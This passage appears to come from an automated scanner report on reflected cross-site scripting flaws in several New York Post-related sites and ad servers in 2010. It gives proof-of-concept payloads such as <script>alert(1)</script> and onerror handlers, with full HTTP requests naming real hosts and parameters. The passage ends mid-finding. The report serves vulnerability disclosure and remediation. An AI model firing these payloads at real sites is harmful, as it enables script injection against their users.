The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646e9'-alert(1)-'9979033da62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1 HTTP/1.1 Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7288 Date: Fri, 26 Nov 2010 20:41:27 GMT Connection: close
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-7978060_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1;net=cm;u=,cm-7978060_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm. ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb45a'-alert(1)-'91eecd11ab0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:50:30 GMT Connection: close Content-Length: 7348
function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this. ...[SNIP]... leclick.net/adj/cm.ny_post/tier2_082410;net=cm;u=,cm-42277532_1290804630,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz1-cm.biz_h-cm.ent_l-cm.sports_h-cm.none_h;;cmw=owl;sz=bb45a'-alert(1)-'91eecd11ab0;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.cm_aa_gn1;btg=cm.pb8k;btg=cm.biz1;btg=cm.biz_h;btg=cm.ent_l;btg=cm.sports_h;btg=cm.none_h?","bb45a'-alert(1)-'91eecd11ab0","",true);</scr'+'ipt ...[SNIP]...
1.98. http://nypost.newspaperdirect.com/epaper/helpandsupport.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nypost.newspaperdirect.com
Path:
/epaper/helpandsupport.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a253b"style%3d"x%3aexpression(alert(1))"7663e53443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a253b"style="x:expression(alert(1))"7663e53443 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /epaper/helpandsupport.aspx?a253b"style%3d"x%3aexpression(alert(1))"7663e53443=1 HTTP/1.1 Host: nypost.newspaperdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=86400 Content-Type: text/html; charset=utf-8 Expires: Sat, 27 Nov 2010 20:33:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:00 GMT Vary: Host Server: Microsoft-IIS/7.5 Set-Cookie: AProfile=tsHwCZzNSV+W7b9EmVkHefNppQo=; expires=Mon, 26-Nov-2040 20:33:00 GMT; path=/epaper/ X-AspNet-Version: 4.0.30319 wc: 1 Date: Fri, 26 Nov 2010 20:32:59 GMT Connection: close Content-Length: 15938
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript"> window.NDScriptsVers ...[SNIP]... <a title="Overview" href="/epaper/helpandsupport.aspx?subpage=PressdisplayOverview&a253b"style="x:expression(alert(1))"7663e53443=1"> ...[SNIP]...
1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e105<a>33f0a8af8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3e105<a>33f0a8af8c1=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:32 GMT Content-Length: 1913 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e9c61<a>9670bb58e0a was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252e9c61<a>9670bb58e0a HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:31 GMT Content-Length: 1907 Connection: close
1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 499b3<a>dcd1813efb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&499b3<a>dcd1813efb4=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:06 GMT Connection: close Content-Length: 20181
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 55e32<a>b0a7e7053a6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325255e32<a>b0a7e7053a6 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:05 GMT Connection: close Content-Length: 20169
1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86602<a>17f7a325ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&86602<a>17f7a325ea4=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:36 GMT Content-Length: 22408 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 1f67b<a>4080466a88e was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132521f67b<a>4080466a88e HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:34 GMT Content-Length: 22396 Connection: close
1.105. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eca17<a>d5af7663947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&eca17<a>d5af7663947=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:35 GMT Content-Length: 5637 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4a37d<a>1d8010bbad2 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524a37d<a>1d8010bbad2 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:32 GMT Content-Length: 5625 Connection: close
1.107. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f0c3f<a>b85df024540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&f0c3f<a>b85df024540=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:06 GMT Connection: close Content-Length: 27398
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 90605<a>9c366260d50 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325290605<a>9c366260d50 HTTP/1.1 Host: publish.flashapi.vx.roo.com Proxy-Connection: keep-alive Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:05 GMT Connection: close Content-Length: 27386
1.109. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c8c7<a>6613c325b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3c8c7<a>6613c325b13=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:34 GMT Content-Length: 8814 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4e1f6<a>5758be85cbc was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524e1f6<a>5758be85cbc HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:32 GMT Content-Length: 8802 Connection: close
1.111. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de428<a>8a3413ae47b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&de428<a>8a3413ae47b=1 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:36 GMT Content-Length: 5534 Connection: close
The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 99e97<a>0a8fa2f50b9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325299e97<a>0a8fa2f50b9 HTTP/1.1 Host: publish.flashapi.vx.roo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 26 Nov 2010 20:30:31 GMT Content-Length: 5522 Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 60647<script>alert(1)</script>0bdac1d23ec was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main.php?callback=jsonp129080571861560647<script>alert(1)</script>0bdac1d23ec&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1 Host: rt.sitebrand.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530 was submitted in the cid parameter. This input was echoed as 9cd22<img src=a onerror=alert(1)>b0820e9530 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce9cd22<img%20src%3da%20onerror%3dalert(1)>b0820e9530&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1 Host: rt.sitebrand.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sid request parameter is copied into the HTML document as plain text between tags. The payload f3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01 was submitted in the sid parameter. This input was echoed as f3eea<img src=a onerror=alert(1)>13fa3e6a01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23ff3eea<img%20src%3da%20onerror%3dalert(1)>13fa3e6a01&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1 Host: rt.sitebrand.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/homedelivery/signup.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the sur request parameter is copied into the HTML document as plain text between tags. The payload 47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654 was submitted in the sur parameter. This input was echoed as 47524<img src=a onerror=alert(1)>7c23df00654 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /main.php?callback=jsonp1290805808871&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=&url=http%3A%2F%2Fwww.nypost.com%2Fhomedelivery%2Fsignup.htm&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=homedelivery1&sid=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=3&sst=1290802578&spt=1290802578&spd=1&npv=6&sur=47524<img%20src%3da%20onerror%3dalert(1)>7c23df00654&sbv=%24Revision%3A+8229+%24 HTTP/1.1 Host: rt.sitebrand.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/homedelivery/signup.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the ur request parameter is copied into the HTML document as plain text between tags. The payload 15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca was submitted in the ur parameter. This input was echoed as 15bb2<img src=a onerror=alert(1)>72efd0729ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /main.php?callback=jsonp1290805718615&bt=Chrome&bv=7&odv=Windows&tz=-6&ur=15bb2<img%20src%3da%20onerror%3dalert(1)>72efd0729ca&url=http%3A%2F%2Fwww.nypost.com%2F&domainKey=3685e2e5-64db-47a3-b8a3-c11c69a4bcb4&pageTemplate=home&cid=f6b8beab-5e25-44e0-96ff-6a65205e33ce&fvt=1289172835&vn=2&sst=1289175929&spt=1289176036&spd=4&npv=5&sur=&sbv=%24Revision%3A+8229+%24 HTTP/1.1 Host: rt.sitebrand.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.118. http://stats.nypost.com/cfb/scoreboards.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.nypost.com
Path:
/cfb/scoreboards.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8145e"><script>alert(1)</script>2082e2a3405 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
